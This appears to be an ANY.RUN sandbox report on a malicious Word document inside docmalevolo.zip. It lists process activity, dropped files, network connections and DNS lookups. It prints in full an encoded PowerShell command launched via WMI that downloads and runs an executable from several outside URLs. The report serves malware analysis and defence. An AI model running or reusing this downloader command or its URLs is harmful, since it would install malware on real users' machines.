File name:

docmalevolo.zip

Full analysis: https://app.any.run/tasks/37e0964d-aee2-4932-b65b-f4721394f2c6
Verdict: Malicious activity
Analysis date: June 21, 2024, 09:16:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

39AC95C105D9D8771CEAD7626576698D

SHA1:

DD4EDD9557C4697FD1202B0C3B90F65167C96D86

SHA256:

CA4AE7154FA1213861596316576A15EF8D6CC2D6C7AC70C723CB6457BE4E8E42

SSDEEP:

3072:jbdks1VMpxHdLnMBWYiearauWO5piCcm0GbrHq:jlGpNd4sgyauWOPiZmlbTq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • May hide the program window using WMI (SCRIPT)

      • WINWORD.EXE (PID: 2936)

  • SUSPICIOUS

    • Reads the Internet Settings

      • rundll32.exe (PID: 3708)
      • powershell.exe (PID: 2948)
      • rundll32.exe (PID: 268)

    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 2936)

    • Executed via WMI

      • powershell.exe (PID: 2948)

    • Creates file in the systems drive root

      • AcroRd32.exe (PID: 3920)

  • INFO

    • Manual execution by a user

      • rundll32.exe (PID: 3708)
      • rundll32.exe (PID: 268)

    • Reads security settings of Internet Explorer

      • rundll32.exe (PID: 3708)
      • rundll32.exe (PID: 268)

    • Reads mouse settings

      • WINWORD.EXE (PID: 2936)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2948)

    • Disables trace logs

      • powershell.exe (PID: 2948)

    • Application launched itself

      • AcroRd32.exe (PID: 2496)
      • RdrCEF.exe (PID: 3512)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2021:02:23 22:28:12
ZipCRC: 0x52427dba
ZipCompressedSize: 75009
ZipUncompressedSize: 131904
ZipFileName: 98eb9584fe82474af8df1d419c82b642
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
14
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs rundll32.exe no specs winword.exe no specs powershell.exe PhotoViewer.dll no specs rundll32.exe no specs acrord32.exe no specs acrord32.exe no specs rdrcef.exe rdrcef.exe no specs rdrcef.exe no specs rdrcef.exe no specs rdrcef.exe no specs rdrcef.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
268"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\98eb9584fe82474af8df1d419c82b642C:\Windows\System32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
596C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\System32\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1524"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1060,17806493674224608798,10731247779713933094,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/20.13.20064 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=17099676560231081348 --mojo-platform-channel-handle=1232 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeRdrCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe RdrCEF
Exit code:
1
Version:
20.13.20064.405839
Modules
Images
c:\program files\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
2164"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1060,17806493674224608798,10731247779713933094,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/20.13.20064 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=16562884271090325448 --mojo-platform-channel-handle=1232 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeRdrCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe RdrCEF
Exit code:
1
Version:
20.13.20064.405839
Modules
Images
c:\program files\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
2308"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1060,17806493674224608798,10731247779713933094,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/20.13.20064 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=9126810637560622999 --mojo-platform-channel-handle=1168 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeRdrCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe RdrCEF
Exit code:
1
Version:
20.13.20064.405839
Modules
Images
c:\program files\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
2496"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\admin\Desktop\98eb9584fe82474af8df1d419c82b642"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exerundll32.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe Acrobat Reader DC
Exit code:
1
Version:
20.13.20064.405839
Modules
Images
c:\program files\adobe\acrobat reader dc\reader\acrord32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
2936"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\98eb9584fe82474af8df1d419c82b642"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
2948powershell -nop -e JAB3AFkAbAAzAE8AQQBxAFYAPQAnAGgAZgBKAHQAOQB3AEsAJwA7ACQAVAAwAFIAZABFAEsAegAgAD0AIAAnADgANgA4ACcAOwAkAGYAOAA4AGoAOQBjAE4APQAnAGkARABRAHAAXwBBACcAOwAkAHoAbwAzAGwAbAA3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABUADAAUgBkAEUASwB6ACsAJwAuAGUAeABlACcAOwAkAFAAdgBuAEwAUQBiAFcAaAA9ACcATgBVAHIANgBTAGEAJwA7ACQAcQB6AHQATABDAHMAMgBUAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABuAEUAVAAuAFcAZQBgAEIAQwBsAGAASQBFAG4AdAA7ACQAQgBjAE0AaAAzAHEAVwAxAD0AJwBoAHQAdABwADoALwAvAHMAYQBzAGEAcwBoAHUAbgAuAGMAbwBtAC8ATQBUAC0ANAAuADIANQAtAGoAYQAvAHMAagBxAEsAeQBvAHAAbwBoAHIALwBAAGgAdAB0AHAAOgAvAC8AdABoAGUAbwB0AGgAZQByAGMAZQBuAHQAdQByAHkALgBjAG8AbQAvAFMARQBnAGUAVgBDAFUAZwBhAHAALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGUAYwBuAG8AYwByAGkAbQBwAC4AYwBvAG0ALwBhAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAC8ASwBrAEcARQBoAEcARQBTAC8AQABoAHQAdABwADoALwAvAHQAaQB0AHQAZwBlAG4ALgBlAHUALwBpAFgATwBXAEMATwBhAHEALwBAAGgAdAB0AHAAOgAvAC8AdABuAGMAbgBlAHQALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AeQBoADAANQAwAHIAXwB3ADYAcwBlAHIALQA5ADAAOAAzAC8AJwAuAFMAcABsAEkAdAAoACcAQAAnACkAOwAkAEEAYwBGADYAegB3AD0AJwBjAGYAWAAxAEoAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQAYwBwAE4ARQBxADUAMAA1ACAAaQBuACAAJABCAGMATQBoADMAcQBXADEAKQB7AHQAcgB5AHsAJABxAHoAdABMAEMAcwAyAFQALgBkAE8AVwBuAEwAbwBBAEQAZgBJAEwAZQAoACQAYwBwAE4ARQBxADUAMAA1ACwAIAAkAHoAbwAzAGwAbAA3ACkAOwAkAHQARwB3AFkAVwBqAGsAMAA9ACcAegBQAFgAcgB2ADIAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJAB6AG8AMwBsAGwANwApAC4AbABlAE4ARwB0AEgAIAAtAGcAZQAgADIANAAzADkAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwBUAGEAUgB0ACgAJAB6AG8AMwBsAGwANwApADsAJABEADIAWQAwADEARQA9ACcAcwBKAEUARgBpADQAMgBDACcAOwBiAHIAZQBhAGsAOwAkAEMANwBmADMARwAzAGoAPQAnAHQAMwB2AGgAbQBiAHMAWQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHADgAVQBXAG4AdQB6AD0AJwBWAFgAaABvAGsATQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3368"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\docmalevolo.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3408"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1060,17806493674224608798,10731247779713933094,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/20.13.20064 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=17292073824797742930 --renderer-client-id=6 --mojo-platform-channel-handle=1456 --allow-no-sandbox-job /prefetch:1C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeRdrCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe RdrCEF
Exit code:
0
Version:
20.13.20064.405839
Modules
Images
c:\program files\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
Total events
25 759
Read events
24 953
Write events
484
Delete events
322

Modification events

(PID) Process:(3368) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3368) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3368) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3368) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3368) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3368) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(3368) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\docmalevolo.zip
(PID) Process:(3368) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3368) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3368) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
1
Suspicious files
74
Text files
4
Unknown types
1

Dropped files

PID
Process
Filename
Type
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3C06.tmp.cvr
MD5:
SHA256:
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2444C6A0.wmfbinary
MD5:2E99E0EA8E9F2D5CC6652AA7864B6B06
SHA256:6F84733D49163702386C45DC6A26163EA201A4A25BB76F06FA7D68174C6FCE47
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A441D621.wmfbinary
MD5:3E99BE28841A445A3CD8B3B4EE299A7A
SHA256:908594D902C48E6AE6EBCCEF6126F2B86C2A0AF733DD877B317E1AC0949A12BE
2936WINWORD.EXEC:\Users\admin\Desktop\~$eb9584fe82474af8df1d419c82b642binary
MD5:2DBD6DA5C7A47BED205DBE1A9A404ED8
SHA256:D33510BB8B00AE4864A358232DAD452620FA1E84B85E09D861E45DE51D92F343
2936WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E269ADEC.wmfbinary
MD5:821630EA9A8868E7AF38864314066CD1
SHA256:D40E5EE33818C9C708D86C4FCDD3250DFF576372EE01F36D445EAAC3F52EA0FA
2936WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:EE1012C4DF282A64E12FCE191A7F437D
SHA256:17CE840646B15AB42C9C573E26FA07AECB811463FDB43DD99C8BB034DFBD1E78
2936WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\98eb9584fe82474af8df1d419c82b642.LNKbinary
MD5:11E6EAE7B9E0710F6174D5F12356EE3E
SHA256:B54F5EBAB0C19946FBA74EEFCCC534ACEC75A54E5C4E0414380FBC1AA77652E4
2936WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:843D83FCE5E595B1A94E917EA758C865
SHA256:17D930542B84889081363F163E3DAF3C128587B04F9220224EC485ACDC51E6F0
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFEB6884E711F8CD2B.TMPbinary
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
3512RdrCEF.exe
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
18
DNS requests
13
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1372
svchost.exe
GET
304
2.19.126.163:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?33775f6043c93e33
unknown
unknown
1372
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
1372
svchost.exe
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
2948
powershell.exe
GET
302
112.78.112.46:80
http://sasashun.com/MT-4.25-ja/sjqKyopohr/
unknown
unknown
2948
powershell.exe
GET
404
112.78.112.46:80
http://www.sasashun.com/MT-4.25-ja/sjqKyopohr/
unknown
unknown
2948
powershell.exe
GET
404
68.66.209.89:80
http://theothercentury.com/SEgeVCUgap/
unknown
unknown
1060
svchost.exe
GET
304
92.122.101.32:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?67a3611ec3c0260d
unknown
unknown
2948
powershell.exe
GET
200
193.141.3.71:80
http://tittgen.eu/iXOWCOaq/
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1372
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1060
svchost.exe
224.0.0.252:5355
unknown
1372
svchost.exe
2.19.126.163:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
unknown
1372
svchost.exe
2.16.241.19:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
1372
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
unknown
2948
powershell.exe
112.78.112.46:80
sasashun.com
SAKURA Internet Inc.
JP
unknown
2948
powershell.exe
68.66.209.89:80
theothercentury.com
A2HOSTING
US
unknown
2948
powershell.exe
191.96.144.227:443
tecnocrimp.com
AS40676
AE
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
ctldl.windowsupdate.com
  • 2.19.126.163
  • 2.19.126.137
  • 92.122.101.32
  • 92.122.101.48
whitelisted
crl.microsoft.com
  • 2.16.241.19
  • 2.16.241.12
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
sasashun.com
  • 112.78.112.46
unknown
www.sasashun.com
  • 112.78.112.46
unknown
theothercentury.com
  • 68.66.209.89
unknown
tecnocrimp.com
  • 191.96.144.227
unknown
geo2.adobe.com
  • 104.124.108.165
whitelisted
tittgen.eu
  • 193.141.3.71
malicious

Threats

PID
Process
Class
Message
2948
powershell.exe
Misc activity
ET INFO Observed ZeroSSL SSL/TLS Certificate
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
docmalevolo.zip